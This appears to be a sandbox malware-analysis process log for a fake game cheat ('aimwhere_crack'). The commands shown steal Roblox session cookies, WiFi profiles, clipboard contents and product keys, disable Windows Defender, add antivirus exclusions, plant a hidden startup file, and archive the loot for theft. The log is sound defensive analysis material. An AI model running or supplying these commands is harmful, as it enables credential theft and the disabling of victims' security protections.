      tree /A /F
      4⤵
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:4452
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3564
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1328
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:1692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1296
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1148
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2860
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3428
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2744
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4332
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1532
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1508
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4928
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:4392
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:4320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47242\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\qbWFz.zip" *"
    3⤵
    PID:4008
  - - C:\Users\Admin\AppData\Local\Temp\_MEI47242\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI47242\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\qbWFz.zip" *
      4⤵
      Executes dropped EXE
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:2164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5032
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:3608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe""
    3⤵
    PID:2364
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:1608

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1920

C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
1⤵
PID:1148
- C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  PID:2360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe'"
    3⤵
    PID:2308
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:1928
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:3176
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2196
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3908
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:5100
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:4648
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:5044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe""
    3⤵
    PID:4752
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
      4⤵
      Views/modifies file attributes
      PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‍.scr'"
    3⤵
    PID:828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1640
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3864
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3056
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:1908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:1932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4392
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:32
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:3516
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3452
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:184
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4884
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2984
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4232
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1472
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4728
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2632
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3204
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:5080
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3388
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4884
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1812
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      PID:4180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3176
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11482\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\6E5wv.zip" *"
    3⤵
    PID:2716
  - - C:\Users\Admin\AppData\Local\Temp\_MEI11482\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI11482\rar.exe a -r -hp"123456" "C:\Users\Admin\AppData\Local\Temp\6E5wv.zip" *
      4⤵
      Executes dropped EXE
      PID:2512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      PID:2244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe""
    3⤵
    PID:2100
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      Runs ping.exe
      PID:5008

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1888

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Desktop\6E5wv.zip"
1⤵
- Suspicious use of FindShellTrayWindow
PID:4344

C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
1⤵
PID:2196
- C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe
  "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  PID:1412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe'"
    3⤵
    PID:1432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:2272
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      PID:1040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    PID:992
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    PID:1096
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Executes dropped EXE
      Modifies registry class
      PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4392
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3612
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    PID:4712
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    PID:884
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:2340
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe""
    3⤵
    PID:1876
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Temp1_aimwhere_crack.zip\aimwhere_crack\aimwhere_steam_module.exe"
      4⤵
      Views/modifies file attributes
      PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'"
    3⤵
    PID:3484
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4504
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1640
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:1616
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:2952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5084
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3860
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    PID:1600
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2360
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1652
